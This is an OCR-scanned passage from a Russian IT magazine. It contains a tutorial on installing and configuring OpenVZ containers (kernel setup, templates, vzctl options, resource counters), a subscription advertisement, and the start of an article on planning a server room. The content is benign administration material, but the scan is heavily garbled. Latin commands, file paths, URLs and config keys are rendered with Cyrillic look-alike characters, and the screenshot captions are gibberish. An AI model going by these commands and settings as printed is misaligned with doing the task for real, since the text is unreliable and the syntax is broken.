ему номер, имя, сетевой адрес, дав прямой доступ к нуж- 
ному оборудованию (если это необходимо) и выделив 
нужное количество ресурсов, которые будут определять 
«мощность» виртуального сервера. 

ОрепѴ2 использует модифицированный планировщик 
процессов, который учитывает не только их приорите- 
ты, но и то, в каком контейнере они исполняются. Это 
позволяет задать жесткое ограничение процессорного 
времени на каждый контейнер, не позволив ему полно- 
стью загрузить весь процессор, лишив возможности 



исполнения процессы других контейнеров. 

Каждый контейнер ОрепѴ2 получает собственный 
виртуальный сетевой интерфейс (ѵепеі или ѵеіЬ) и 
полноценный, полностью обособленный от нулевого 
контейнера, сетевой стек, обеспечивающий контейнер 
отдельными ІР-адресом, таблицей маршрутизации и 
правилами брандмауэра. Одной из важнейших воз- 
можностей ОрепѴ2 является механизм так называе- 
мого «чекпоинтинга», позволяющий сохранить образ 
контейнера на жесткий диск и восстановить его работу 
с прерванного места. Более того, образ можно безболез- 
ненно перенести на другую машину и восстановить его 
работу уже на ней. Причем даже если в момент «замо- 
розки» на адрес одного из сетевых сервисов контейнера 
придет запрос, он будет вполне успешно обработан по- 
сле восстановления, а для клиента это будет выглядеть 
как обычная задержка в ответе (например, на открытие 
ѵѵеЪ-страницы ушла не доля секунды, а 5 секунд) . 
ОрепѴ2 очень хорошо масштабируется. Одна физиче- 
ская машина может с легкостью обслуживать несколько 
сотен не слишком требовательных к ресурсам контей- 
неров, и пользователи каждого из них даже не заметят 
каких-либо проблем с производительностью. 



• В любой момент из 
контейнера можно 
создать новый шаблон: 

1:аг -С /ѵаг/НЬ/ѵг/ 
рпіѵа1:е/100 -сті / 
ѵаг/1іЬ/ѵ2/1:етр1а1:е/ 
сасбе/сІеЫап-5.0- 
си5І:от-х86_64 Лаг.% 2 . 



Ограничения 

Помимо уже упомянутого ограничения на тип поддер- 
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0репѴ2 ѴѴеЬ РапеІ — одна из лучших панелей управ- 
ления ОрепѴІ 



живаемых ОС, которое вытекает из того факта, что все контейне- 
ры работают на одном ядре Ілпих, у ОрепѴ2 есть несколько более 
мелких, но заслуживающих внимания недостатков (справедли- 
вости ради следует отметить, что это проблема всех реализаций 
системы виртуализации уровня ОС). Во-первых, ОрепѴ2 накла- 
дывает определенные ограничения на работу софта, который за- 
висит от низкоуровневых функций ядра. Так, например, ядерный 
ЫР5, ОрепѴРЫ и ІРЗес внутри контейнера работать не будут. 
Какие-то другие программы, зависимые от ядерных модулей, 
также откажутся правильно функционировать (хотя в некото- 
рых случаях ОрепѴ2 позволяет загрузить в контейнер модули) . 

О различных ядерных патчах тем более придется забыть раз и 
навсегда. Во-вторых, все контейнеры ОрепѴ2 используют один 
дисковый своп, а это значит, что если оперативная память между 
контейнерами будет распределена неправильно, система может 
начать тормозить в самый неподходящий момент. К счастью, про- 
блема решается с помощью разделения памяти таким образом, 
чтобы ее суммарный объем составлял не более 80-90% от общего 
количества. В-третьих, контейнеры ОрепѴ2 используют один 
дисковый кэш, поэтому если какой-то контейнер начнет активно 
обращаться к жесткому диску, то он может заполнить весь кэш 



своими данными, и другим контейнерам придется долго ждать 
очереди, чтобы записать/прочитать данные с диска. В связи с 
этим я бы не рекомендовал использовать ОрепѴ2 для «хостинга» 
серверов, активно работающих с диском (для таких задач во- 
обще всегда рекомендуется использовать выделенный железный 
сервер). 

Наконец, в-четвертых, ОрепѴ2 использует очень неэффективный 
механизм ограничения контейнеров в количестве оперативной 
памяти. Вместо подсчета реально используемой приложениями 
контейнера памяти он считает количество выделенной памяти, 
и это придется учитывать при запуске приложений, запраши- 
вающих большие количества памяти при запуске, но не исполь- 
зующих ее всю во время работы (например, так ведет себя всем 
известный тетсасЬеб при дефолтовых настройках) . 

Установка 

Являясь «системой уровня предприятия» и основой платного 
продукта ѴігШогго, ОрепѴ2 в первую очередь рассчитана на при- 
менение в дистрибутивах линейки КНЕЬ, поэтому официальные 
сборки ОрепѴ2-ядра доступны только для этого дистрибутива. 
Неофициально же ОрепѴ2 доступен в ОеЫап, разработчики 
которого самостоятельно патчат и готовят ядро ОрепѴ2 (пакет 
1іпих-орепѵ2-і386 РІХМЕ). 

В ШшпШ ядра ОрепѴ2 нет еще с версии 8.10, поэтому у его пользо- 
вателей остается два способа установить ОрепѴ2 на сервер: про- 
патчить и собрать ядро самостоятельно либо взять уже патченое 
ядро из ШшпШ 8.04. Для тех, кто считает последний подход бредо- 
вым, поясню: во-первых, стабильное ОрепѴ2-ядро на сегодняш- 
ний день до сих пор имеет номер версии 2.6.18, тогда как в ШшпШ 
8.04 используется даже более свежее ядро 2.6.24; во-вторых, 
ЦЪипШ 8.04 является ЬТЗ-дистрибутивом, а значит, обновления 
безопасности для любых его компонентов будут выходить вплоть 
до 2013 года, что, на мой взгляд, вполне приемлемо. Итак, если 
мы имеем дело с КНЕЬ, то ОрепѴ2 можно установить из офици- 
ального источника. Для этого необходимо добавить репозиторий 
орепѵг.ог^ в ушп: 

# ссі /еІс/уит.пероБ.сІ 

# м§е1: Іііір : //сіоыпіоасі . орепѵг . ог§/орепѵ 2 . перо 

# грт --ітрогі: Іі1:1:р://сІоіл/п1оасІ. орепѵг. ог§/КРМ-СРС-Кеу-0репѴ2 

Отключить ЗЕЬіпих: 
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Уже на протяжении многих лет команда 
ОрепѴ2 регулярно отсылает Торвальдсу 
патчи 



# есііо '5ЕІ_ІІ\ІІІХ=сІІ5аЫесІ ' > /еіс/5у5соп{і§/е1іпих 
И установить ядро и утилиты управления: 

# уиш іпбіэіі оѵікегпеі 

# уиш іпбіэіі ѵгсіі ѵгдиоіа 

В ЭеЬіап все просто, достаточно выполнить только одну 
команду: 

$ біісіо арі-§е1: іпбіэіі ѵгсіі ѵгдиоіа \ 
1іпих-орепѵ2-і386 

В ЦЪшіт сложнее. Сначала необходимо добавить репо- 
зиторий ЦЪипш 8.04, для чего следует создать файл / 
еЩ/арІ/5оигсе5.1І5І.б/Ьагбу-таіп.1І5І: и поместить в него 
следующие строки: 

# ѵі /еіс/арі/Боигсез ЛІБі.сі/ІіагсІу-таіп Лібі: 

сІеЬ Іі1:1:р://тіггог.уапсІех. ги/иЬипіи багсіу таіп 
сІеЬ біір://тіггог .уапсіех. ги/иЬипіи 
ІіагсІу-ирсІаіеБ таіп 
сІеЬ Ьі1:р://тіггог .уапсіех. ги/иЬипіи 
Ьагсіу-зесигіііу таіп 

Только после этого можно установить ОрепѴ2-ядро и 
утилиты: 

$ біісіо ар1:-§е1: ирсіаіе 

$ біісіо ар1:-§е1: іпбіэіі ѵгсіі ѵгдиоіа 

Ііпих-орепѵг 

После установки в любом из трех дистрибутивов необхо- 
димо изменить некоторые настройки ядра, иначе ОрепѴ2 
будет работать некорректно. 

Открываем файл /еЩ/вувсЙ.сопі и пишем в него следую- 
щее: 

# ѵі /еіс/вувсіі.соп-р 

пе1:.ірѵ4.соп-р.сІе-Раи11:.ргоху_агр = 1 
пе1:.ірѵ4.ір_-Ропл/агсІ = 1 
пеі.ірѵД.соп-р.аІІ. гр_б11:ег = 1 
кегпеі . зузгц = 1 

пеі.ірѵ4.соп-Р.Ье-Раи11:.5епсІ_гесІігес1:5 = 1 
пе1:.ірѵ4.соп-р.а11.5епсІ_гесІіпес1:5 = 0 

Перезагружаем машину и загружаемся уже с новым 



Г*< ь* № ни ил 

пе1:.ірѵ4.сопТ.сІе1 : аиІ н Е.ргоху_агр = 1 
пе*.ірѵ4.ір Гогиапі - 1 
пе1.ірѵ4.сопГ.а1Л. грііііег = 1 
пеі .ірѵ4.согѵГ.йіе^аііІ^. &епй гесИгесѣй = 1 
пе1.ірѵ4.согЦ.а11.5еп<Щге<іігесІ5 = 1 
кегпеі. зуагд = 1 

Переменные ядра нужно менять обязательно 



ядром. Чтобы запустить необходимые для правильной 
работы ОрепѴ2 шегзрасе-сервисы, набираем: 

# /еіс/іпіі.сі/ѵг Біагі: 



Шаблоны ОС 

Как уже было сказано выше, для каждого контейнера 
ОрепѴ2 создает независимый контекст исполнения, 
который, за вычетом всего остального, имеет собствен- 
ное файловое дерево, полностью обособленное от фай- 
ловой системы нулевого контейнера. Поэтому перед 
тем как приступить к опробованию боевых качеств 
ОрепѴ2, мы должны подготовить набор файлов, кото- 
рые будут формировать файловую систему для будущих 
контейнеров (так называемый шаблон) . 

Существует три способа это сделать: 

1. Скопировать файловое дерево из основной системы, 
что приведет к тому, что любой новый контейнер будет 
представлять собой копию существующей системы 
(нулевого контейнера) . 

2. Взять существующий дистрибутив Ілпих и получить 
готовый шаблон, выбросив из него ядро, іппгатіз- 
образ и внеся несколько изменений. 

3. Скачать подходящий шаблон с сайта ОрепѴ2. 

Мы пойдем по пути наименьшего сопротивления и вос- 
пользуемся третьим способом. Для этого переходим в 
каталог-хранилище шаблонов: 

$ ссі /ѵаг/ІіЬ/ѵг/іетрІаіе/сасЬе 




НТТР://ѴѴѴШ 

■| Г 

> Ііпкз 

• Все, что нужно 
знать о Ю В С : 

уѵікі.орепѵ 2 .огд/ЦВС ; 

• Руководство по соз- 
данию шаблонов: 

Шр://доо.д[/Ыд І\І1_. 

• 0 том, как произ- 
водить чекпоинтинг: 

Ьир://доо.дІ/12Ь2ѴѴ . 

• Как превратить 
физический сервер в 
виртуальный: 

ЬирУ/доо.дІ/вУіхР ; 

• Настройка 1/0- 
приоритетов для 
контейнеров: 
ЬирУ/доо.діМііѴ . 



И скачиваем нужный шаблон с помощью ш§е1: 

$ біісіо м§е1: Іі 1 : 1 :р://сІоіл/п 1 оасІ.орепѵ 2 .оп§ 
/іетрІаіе/ргесгеаіесІ/сІеЬіап - 5 . 0-х86 Лаг. ^2 

Весь список подготовленных шаблонов можно просмо- 
треть, открыв страницу бомтІоаб.орепѵг.ог^ЛетрІаіе/ 
ргесгеаіесі в браузере. 

Создаем контейнеры 

Для управления ОрепѴ2 используется несколько кон- 
сольных утилит, наиважнейшая из которых носит имя 
Ѵ2СІІ. Она применяется для создания, удаления, запуска, 
остановки, а также изменения настроек контейнеров. 
Любой сисадмин ОрепѴ2 должен знать все ее параметры 
и опции назубок. Способ вызова утилиты следующий: 

# Ѵ2СІІ команда номер_контейнера аргументы 

Команда — это действие, которое должен выполнить 
ОрепѴ2, а аргументы уточняют или дополняют его. 

Для создания контейнера используется команда сгеаіе, 
для изменения параметров — зеі, для уничтожения — 



• Список панелей 
управления 0репѴ2: 
ЬЦрУ/доо.дІ/КІ'ЕЬВ . 

• 0репѴ2 ѴѴеЬ РапеІ, 
одна из лучших 
ѵѵеЬ-панелей для 
управления 0репѴ2: 

Шр://доо.д[/х71ЛГ . 

• Настройка 0репѴ2 
ѴѴеЬ Рапеі: 

Ьир://доо.д[/ѵх73и . 

• Описание процесса 
установки 0репѴ2 

в ІЛэипІи 1 0.04 с 
помощью сборки из 

ИСХОДНИКОВ: 

бир://доо.д[/ХЕаои . 
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- I 

Для запуска контейнера достаточно выполнить одну 
команду 



сіезіхоу. Также доступны команды еШег, зіагі:, БЮр и гезіагі:, позво- 
ляющие «заходить» в контейнеры и управлять их работой. 

Ѵ 2 СЙ — очень гибкая утилита, с помощью которой можно создать и 
полностью настроить контейнер почти любой сложности, не затронув 
ни единого конфигурационного файла. Вот как это делается: 

1. Сначала создаем новый контейнер с номером 100 (кстати, в качестве 
номера удобно использовать последнюю часть его ІР-адреса) : 



# Ѵ 2 СІ 1 сгеаіе 100 --ОБІетрІаІіе сІеЬіап- 5 . 0 -х 86 \ 
--соп 6 § ѵрБ.Ьазіс 



4 — «* МП - ■ =->=— ЧП-И I ІІІІІІ 

Л |гі> ѵ**~ Ъ-**» гн* 

> зийа ѵісхі егсвіе 1Ѳ6 —озгсгарііъіе ^сЬійп-5.6-х65 **с - 
оптіэ ѵр$.№5іс 

Сгміілд ѴЕ ргіѵэіе агеэ ІйеЬіагьЗ.б х86! 

РегГбппіпд рвдигеаіе -асСІопг 
ѴЕ ргіѵаіе лгел ил5 сгсііН 

> 5ийй Ѵ2«1 5*1 18Ѳ --йгіЬййІ у*5 
5аѵёеІ рагате^егБ Іо г ѴЕ 168 

> зисіа ѵісіі *ес 100 --Ыэъіпвк Ішг.пі --ааѵе 
Блѵий рлГйілцІйГЗ 7аг ѴЕ 160 

> вис Іа Ѵ2СІІ 5*1 160 --ірсЫ аіі -ірагісі 132,163.6.160 

- -БвІГЕ 

5аийс1 рлг&шл%фгь -Гог Ѵ^ 188 

> Зийи ѴІСІІ 3*1 160 ■■патемггѵрг 162.16В. ИЛ --ійѵ« 

БаѵвсІ рагатвІЕГв Іпг ѴЕ 166 

з- виеіп ѵ?сИ 5е| |М --изе гао^Ш --ваѵе 
5Т4ГСІП8 ѴЕ , . * 

ѴЕ іі шсип^сі 



Создать новый контейнер ОрепѴ2 действительно 
просто 



# ѵгсіі зеі: 100 --ѵт§иагра§е 5 256 М: 256 М --заѵе 

# ѵгсіі зеі: 100 --ргіѵѵтра§е 5 512 М: 512 М --Баѵе 

10 . Теперь можно войти в контейнер и продолжить настройку уже 
внутри него (установить необходимые сервисы, настроить бранд- 
мауэр и маршрутизацию) : 



# ѵгсіі епіег 100 



Здесь беЬіап-5.0-х86 — это скачанный ранее шаблон без расширения 
іж.§ 2 , а ѵрБ.ЬаБІс — набор стандартных предустановок, которые мы все 
равно собираемся менять. 

2. Меняем настройки контейнера так, чтобы он запускался при загруз- 
ке системы: 

# Ѵ2СІ1 Бе! 100 --опЬооГ уеБ --Баѵе 

3. Меняем сетевое имя контейнера: 

# Ѵ2СІ1 Бе! 100 --ІЮБІіпате ту-бгБІ-ѵрБ .ог§. ги --Баѵе 

4. Даем ему новый ІР-адрес: 

# Ѵ2СІ1 Бе! 100 - - ірсіеі аіі --ірасісі 192.168.0.100 --Баѵе 

5. Указываем дефолтный ЭИВ-сервер: 

# Ѵ2СІ:1 5е1 100 --патеБепѵеп 192.168.0.1 --Баѵе 

6. Устанавливаем пароль пользователя гооЦ 

# Ѵ2СІ1 5е1 100 --иБеграББысІ гоо1::ра55ыопсІ --Баѵе 

7. Выделяем контейнеру 15% от общей мощности процессора (один 
процессор — это 100%, два — 200%, четыре — 400% и так далее) : 

# Ѵ2СІ1 Бе! 100 --сриіітіі: 15 --Баѵе 

8. Выделяем контейнеру 20 Гб дискового пространства с возможно- 
стью его превышения до 25 Гб на небольшой промежуток времени: 

# Ѵ2СІ1 БеГ 100 --сІІБкБрасе 20С:25С --Баѵе 

9. Устанавливаем ограничение на объем оперативной памяти (в пер- 
вой строке устанавливаем гарантированный ресурс, во второй — не- 
гарантированный, он будет доступен контейнеру только в том случае, 
если в системе есть его излишек) : 



Более подробную информацию о настройке контейнеров можно по- 
черпнуть из тап-страницы Ѵ2СЙ. 

иве 

В терминах ОрепѴ2 лимиты и гарантии ресурсов называются ІІзег 
ВеапсоитегБ (ІІВС) . Всего существует около 20 ГШС, контролирую- 
щих почти все возможные ресурсы системы. Каждый ІІВС имеет 
свою опцию в команде ѵгсіі, а также строку в файле /ргос/и5ег_ 
ЬеапсоиШегБ, с помощью которого можно узнать о текущем количе- 
стве выделенных ресурсов и определить их нехватку. Файл представ- 
ляет собой таблицу, каждая строка которой содержит информацию 
об одном ресурсе, а колонки отражают следующие данные: 

Файл /ргос/и5ег_Ьеапсоип1:ег5 

• иісі - идентификатор контейнера; 

• геБоигсе - имя ресурса; 

• Гіеісі - текущая утилизация ресурса; 

• тахііеіеі - максимальный уровень утилизации ресурса 
за все время работы контейнера; 

• Ьаггіег - максимальный уровень утилизации ресурсов, 
который может быть временно превышен; 

• Птіі: - жесткое ограничение утилизации ресурса, 
которое никогда не может быть превышено; 

• Гаііспі: - счетчик отказов, который увеличивается каждый раз, 
когда контейнер делает запрос ресурсов сверх своего лимита. 

Не обязательно разбираться во всех тонкостях системы подсчета ре- 
сурсов ОрепѴ2, чтобы эффективно управлять контейнерами. Доста- 
точно время от времени поглядывать на значение колонки Іаіісш и, 
если оно оказывается больше нуля, начинать предпринимать меры 
либо по оптимизации исполняемого в рамках контейнера софта, 
либо по увеличению количества выделяемых контейнеру ресурсов. 

Выводы 

Эта статья охватывает лишь малую часть того, что принято на- 
зывать термином «виртуализация уровня ОС», но изложенной в ней 
информации вполне достаточно, чтобы начать применять техноло- 
гию и двинуться дальше. И-И 
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1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта зЬор. 

діс.ги . 

2. Оплати подписку через любой банк. 
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документов — купона и квитанции — 
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Москве в пределах МКАД 






12 НОМЕРОВ - 2200 руб 
6 НОМЕРОВ - 1260 руб. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ ЖУРНАЛ 
НАМНОГО ДЕШЕВЛЕ! 
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ПРИ ПОДПИСКЕ НА КОМПЛЕКТ 
ЖУРНАЛОВ 
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ЕСТЬ ВОПРОСЫ? п иши на іпГойдІс.ги или звони по бесплатным 
телефонам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3- 
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МТС, БиЛайн и Мегафон). 
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1 — 1 на домашний адрес 
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Азбука серверной 

Оборудуем серверную комнату для компаний 
малого и среднего бизнеса 

В этой статье будет подробно рассмотрен процесс проектирования серверного помещения, описа- 
ны общие рекомендации, правила и методы построения серверной. 



Зачем нужна серверная? 

Прежде всего нужно сказать, что серверная — это комната, занятая 
крупным телекоммуникационным и/или серверным оборудованием 
(Денис, я понимаю, что гонорар у нас зависит от количества символов, 
но это же не повод рассказывать читателям ] [ о том, что такое сер- 
верная :) — прим, ред.) . Создание серверной — процесс недешевый, 
поэтому прежде, чем приступить к проектированию, нужно решить, 
зачем тебе нужно серверное помещение. Решить, не опираясь на такие 
эфемерные аргументы, как «у соседей есть, а у меня — нет» или «сер- 
верная — это круто». Нужно выделить преследуемые цели, именно от 
них и зависит, какой будет серверная (настоящий ангар или маленькая 
каморка) . Тщательное осмысление цели может привести даже к осо- 
знанию того, что серверная тебе вовсе не нужна. На мой взгляд, можно 
выделить три основных цели создания серверной. 

Первая — это эффективное размещение оборудования в одном месте. В 
результате помимо удобства получишь еще и повышение продуктивно- 
сти — не нужно бегать с этажа на этаж в поисках конкретного сервера. 

В качестве небольшой иллюстрации хочется вспомнить одну организа- 
цию, в которой было три сервера. Первый (шлюз) находился на первом 
этаже возле охраны — видимо, когда «тянули» интернет, посчитали, 
что так будет удобнее (удобнее сотрудникам провайдера, но никак не 
администраторам заказчика) ; сервер баз данных — на втором этаже, а 
контроллер домена — вообще в другом крыле. Согласись, было бы на- 
много удобнее разместить все эти серверы в одном помещении. 

Вторая цель — защита «стратегических объектов» от несанкциониро- 
ванного доступа. Иногда обычная уборщица может оказаться самым 
злостным хакером, потому что пути швабры ее неисповедимы. И 
вообще, лучше, если серверы будут меньше бросаться в глаза обычным 
пользователям — поэтому, если сервер не один, желательно выделить 
для них отдельное защищенное помещение. Впрочем, о защите сервер- 
ной мы поговорим отдельно. 

Третья цель — оградить серверное оборудование от сбоев питания и 
не благоприятных условий окружающей среды благодаря поддержа- 
нию постоянных климатических условий внутри серверной. 

Атеперь разберемся, для кого серверная не является необходимой. 
Если у тебя всего один сервер, и он же — рабочее место администрато- 
ра, то совершенно очевидно, что серверная не нужна. Лучше потратить 
немного денег и купить приличный ИБП для сервера. Да, приличный, 
а не тот, который установлен сейчас — на нем сервер «протянет» в 
лучшем случае минут пятнадцать. 

Начинаем проектировать 

Если серверная тебе все-таки нужна — читайдалыпе. Перед проек- 
тированием серверной нужно раздобыть план здания, в котором она 
будет размещаться, с целью выбрать для нее оптимальное помеще- 
ние. Отталкиваясь от плана, можно создавать проект серверной. Не 
стоит сразу начинать тащить все сетевое оборудование в выбранную 
комнату. Сначала проект, потом реализация. Как в пословице: семь 
раз отмерь. . . Желательно, чтобы проект соответствовал принятым 
стандартам (о них — немного позже), содержал сведения обо всех 



соединениях, маршрутах, местоположении оборудования. Не забудь 
и о приличных источниках питания (об этом мы тоже поговорим от- 
дельно). 

Все объекты серверной можно разделить натри большие группы: 
физические, логические, сервисные. Кпервым относятжелезо (ком- 
мутаторы, серверы и так далее) , а также климатическое оборудование 
(впрочем, и о выборе кондиционера мы также поговорим особо) . 
Логические объекты — это программное обеспечение, а сервисные — 
средства связи (как внутренней, так и доступа к интернету) . 

Раньше в крупных компаниях было два отдела — отдел связи и сервер- 
ная. В отделе связи располагались устройство автоматического распре- 
деления вызовов (АшотаПс Саіі ПізтЬшіоп), кнопочные телефонные 
системы (КеуТеІерЬопе ЗузЩт), внутренние АТС и так далее. Сейчас 
очень часто все это оборудование помещают в серверную. В принципе, 
так действительно удобнее, к тому же нет необходимости выделять еще 
одну комнату и обеспечивать ее защиту (как минимум необходимы 
кодовый замок и камера наблюдения) . 

Хорошая серверная (а не ее жалкое подобие) должна соответствовать 
стандарту ТІА-569, в котором описаны требования к серверному по- 
мещению. 

1. Наличие не менее одной двойной электрической розетки с заземле- 
нием на каждые три погонные метра любой стены. Представим, что у 
нас есть комната 3x4. По стандарту в ней должно быть четыре двойных 
заземленных розетки. Если розеток больше — тоже хорошо. Вот только 
не забываем о ключевом слове «заземление». Если здание достаточно 
древнее, желательно еще и поменять электрическую проводку в сер- 
верной, чтобы не было проблем хотя бы с электричеством. 

2 . Максимальная распределенная нагрузка на пол должна составлять 
12 кПа, максимальная сосредоточенная нагрузка — 4.4 кН. 

3. Для освещения комнаты рекомендуется использовать галогенные 
лампы для снижения электрических помех. Сейчас появились так на- 
зываемые «экономные лампы» — тоже неплохой вариант для сервер- 
ной. Они не только экономят электричество, но и выделяют меньше 
тепла, что особенно актуально летом. 

4 . Серверную нужно располагать вдали от источников электромагнит- 
ного излучения. Желательно, чтобы после размещения всего оборудо- 
вания в помещении был запас пространства — на случай расширения. 

5. Минимальный допустимый размер серверной — 12 кв. м, но это дей- 
ствительно минимальный размер для серверной. На бумаге размеры 
помещения не ощущаются. Попробуй найди комнату размером 12 кв. 
м и представь, что в нее нужно поместить все необходимое оборудо- 
вание. А ведь еще в этой комнате должно остаться пространство для 
администратора (администраторов). 

6. Минимальная высота потолка серверной составляет 2.44 м. 

7. Система кондиционирования должна поддерживать температуру 
18-24 градусов по Цельсию и относительную влажность 30-55%. 

Кроме серверной в помещении могут быть телекоммуникационные 
шкафы. В них, как правило, размещают оборудование, обслуживаю- 
щее текущий этаж. В одной организации видел самый уникальный 
телекоммуникационный шкаф: он представлял собой коробку от 
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Ссылки 



• Стандарт ТІА-569: ігд.иа/І с; 

• здесь можно ознакомиться с примерными ценами на 

серверные стойки и шкафы (ссылка приводится не из 
соображений рекламы): эти; 

• ТОПОЛОГИЯ ИБП : ; 

• системы видеонаблюдения: ; 

• расчет ЕЕП: еп.ѵѵі кіресііа .огд/ѵѵікі/Епегду ейісіепсѵ гаііо : 

• «уникальный» телекоммуникационный шкаф: 
рбрЬЬ2Аоріс4970.ЫтІ . 

материнской платы, подвешенную к потолку. В коробке находился 
коммутатор. . . 

Требования ТІА-569 к шкафам следующие: 

1 . На каждом этаже должен быть как минимум один шкаф . 

2. Несколько шкафов на одном этаже нужно соединять как минимум 
одним кондуитом (металлические и неметаллические трубки жесткой 
или гибкой конструкции, разрешенные для применения соответствую- 
щими электрическими инструкциями) калибра 3. 

3. В шкафу не должно быть фалыппотолков. 

4. Минимальный размер двери шкафа: высота 2 000 мм, ширина — 

910 мм. Дверь должна открываться наружу (или раздвигаться) , но не 
внутрь. 

5. Уровень освещенности в шкафу — не менее 5 40 лк на высоте 1 мнад 
уровнем пола. 

6. Наличие как минимум двух розеток. 

7. Шкаф должен быть подключен к главному электроду системы за- 
земления здания. 

Помимо требований к шкафам есть еще и рекомендации, выполнять 
которые не обязательно, но желательно: 

1. Размер шкафа (площадь пола) при обслуживаемой площади до 
500 кв.м составляет 3.0 м х 2.2 м, при площади до 800 кв.м — 

3.0 м х 2.8 м, при площади до 1 000 кв. м — 3.0 м х 3.4 м. Если 
обслуживаемая площадь превышает 1 000 кв. м, нужно обеспечить 
наличие дополнительных шкафов на этаже. 

2. Две стены шкафа рекомендуется покрыть панелями из ДСП или 
фанеры для монтажа настенного оборудования. 

3 . Шкаф желательно располагать ближе к центру обслуживаемой 
зоны. 



Стойки для серверного 
оборудования 

Итак, ты уже выбрал комнату для серверной и модифицировал (если 
необходимо) ее проводку. Самое время установить в ней сетевое обо- 
рудование. Но чтобы оборудование было упорядочено, необходимы 
телекоммуникационные стойки — специальные конструкции, пред- 
назначенные для удобного, компактного и безопасного размещения 
серверов, маршрутизаторов и другого сетевого оборудования. 

Если ты никогда раньше не работал со стойками, нужно поговорить 
об их размерах. Ширина стойки составляет 19 дюймов (или 482,6 мм) 
— это стандарт, но встречаются стойки с шириной 10 или 23 дюйма. 
Глубина выбирается в зависимости от используемого оборудования 
и может быть 600, 800 или 900 мм, но бывают стойки и с большей глу- 
биной. Оборудование монтируется в стойку в специальных корпусах 
(такие корпуса называются Касктоиш) . Как правило, ширина корпуса 
составляет 17,75 дюймов (450,85 мм), а высота измеряется в количе- 
стве так называемых юнитов (Шй, о них позже) . Так что для установки 
сервера в стойку придется покупать специальный корпус для него. 
Теоретически можно установить в стойку обычный компьютер в кор- 
пусе МіпіТоѵѵег (естественно, установленный на бок) с помощью специ- 
альных поддонов, но практикуется такой подход очень редко. Если ты 
хочешь сэкономить, то зачем тогда вообще нужна стойка? 

Теперь разберемся, что такое юниты (или стоечные юниты — так 
правильнее) . Крепежные отверстия располагаются на вертикальных 
элементах стойки каждые 1.75 дюйма (444,5 мм), этавеличинаи 
называется одним юнитом. Высота стойки, как правило, указывается 
в количестве юнитов, что очень удобно — тебе не нужно вычислять, 
сколько элементов поместится в стойку 4211 — это и так понятно . В нее 
поместится 42 элемента по Ш. Обычно устанавливаемое оборудова- 
ние чуть меньше, чем Ш — не 444 мм, а437 — это позволяет удобно 
устанавливать и извлекать любое оборудование без необходимости 
извлечения верхнего или нижнего от него устройства. 

Комплектация стойки бывает разной. Это может быть просто стойка, 
а может быть стойка со стеклянной дверью, что не только более эсте- 
тично, но и позволяет ограничить доступ к установленному в стойку 
оборудованию. Более дорогие стойки оснащаются системами охлаж- 
дения, но и тут возможны варианты — от обычных вентиляторов до 
автономных сплит-систем. Также стойки могут оснащаться различны- 
ми индикаторами (например, температура внутри стойки), распреде- 
лителями питания и так далее. Тут все зависит от цены — чем дороже, 
тем больше «опций» будет в стойке. На рисунке 1 изображена стойка с 
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Рис. 2. Типичная стойка 
без охлаждения 



Рис. 1. Серверный шкаф с 
охлаждением 

автономной сплит-системой: дверь здесь используется не для красоты, 
а для поддержания оптимальной температуры внутри стойки. Стойки 
с системами охлаждения и дверями некоторые производители на- 
зывают сейчас серверными шкафами — впрочем, так даже понятнее. 
На рисунке 2 изображена стойка без охлаждения и без двери. Стойки с 
охлаждением стоят дороже, но зато позволяют сэкономить на конди- 
ционерах внутри серверных: вам уже не нужен мощный кондиционер, 
хватит самого простого — для персонала, который будет находиться 
внутри серверной. 

Пару слов о ценах. Раз статья у нас практическая — ты должен знать, 
что сколько стоит. Типичная стойка 2011, на колесиках, без охлаждения 
и двери, с глубиной 600 или 900 мм стоит от $270 до $400 соответ- 
ственно. Но можно найти варианты и дешевле — кто ищет, тот всегда 
найдет. Настенный серверный шкаф 1211 без комплекта вентиляторов 
(зато с дверью, запираемой на ключ) обойдется в $230. Стоимость вен- 
тиляторов — от $19 (за 1 вентилятор) до $120 за вентиляторную полку 
из шести вентиляторов. Шкафы 611 стоят от $130. 

Классический (не настенный) шкаф высотой 2211 с вентиляторами и 
розетками стоит около $900, более серьезные шкафы — от $1500. Есть 
совсем мощные модели — всепогодные шкафы, предназначенные для 
наружного использования. Такой шкаф размером 1500мм х 550мм х 
1600мм будет стоить от $5000. Но в нашем случае такой шкаф не нужен 
— если, конечно, в серверной есть окна и не течет крыша. 

ИБП для серверной 

Вспомним цели, ради которых мы создавали серверную, а именно — 
удобное размещение оборудования, защита от несанкционированного 
доступа, перепадов питания и неблагоприятных климатических усло- 
вий. Первые две цели уже достигнуты благодаря выделению отдельной 
комнаты и покупке серверной стойки (или нескольких — в зависимо- 
сти от количества оборудования) . Сейчас мы поговорим о защите от 
сбоев питания, а чуть позже — об организации подходящих климатиче- 
ских условий. Когда есть всего один сервер, то достаточно купить один 
мощный ИБП и задача будет достигнута. Но если речь идет о целой 
серверной комнате, к выбору ИБП нужно отнестись более серьезно — 
хотя бы потому, что это штука дорогая, а средняя наработка на отказ в 
дорогих моделях составляет более десяти лет, так что к покупке ИБП 
нужно отнестись не просто как к покупке оборудования, а как к капита- 
ловложению. Я более чем уверен, что за это время ты поменяешь свои 
сервера, а ИБП — останутся. Очень жаль, но часто об ИБП вспоминают 
в самую последнюю очередь — когда от перепада напряжения сгорела 
материнская плата, умер жесткий диск или произошла потеря данных 




Рис. 3. Вентиляторная полка. Примерно $120 




Рис.4. ИБП АРС ЗтагМІРЗ РТ 5000ѴА, вид спереди 

(последнее в современном мире обходится дороже, чем замена жест- 
кого диска) . Вот тогда покупают ИБП для сервера. Позже (как правило, 
после очередного перепада) покупаются ИБП для рабочих станций 
(и то не для всех) , в итоге получается хаотическая система. Нужно ее 
упорядочить. 

Итак, начнем подбор ИБП. Нам нужен ИБП мощностью 5-6 кВА (более 
слабые модели отлично подойдут для рабочих станций, но никак не для 
серверной комнаты) . С мощностью все просто — покупаем мощные 
модели ИБП, и на этом все. Хотя некоторые специалисты утвержда- 
ют, что нижняя граница мощности составляет 1 кВА, и рекомендуют 
ИБП вроде АРС БтагМІРБ КТ 1000ѴА. В качестве примера можно 
привести статью «Источник бесперебойного питания для серверов» 
(опубликована на сотрге55.ш) . Да, выходит, дома под столом у меня 
серверный ИБП (МшГекРоѵѵегМшІ: 1000), а я об этом и не знал, потому 
что всю жизнь думал, что для сервера нужно что-то помощнее . . . Если 
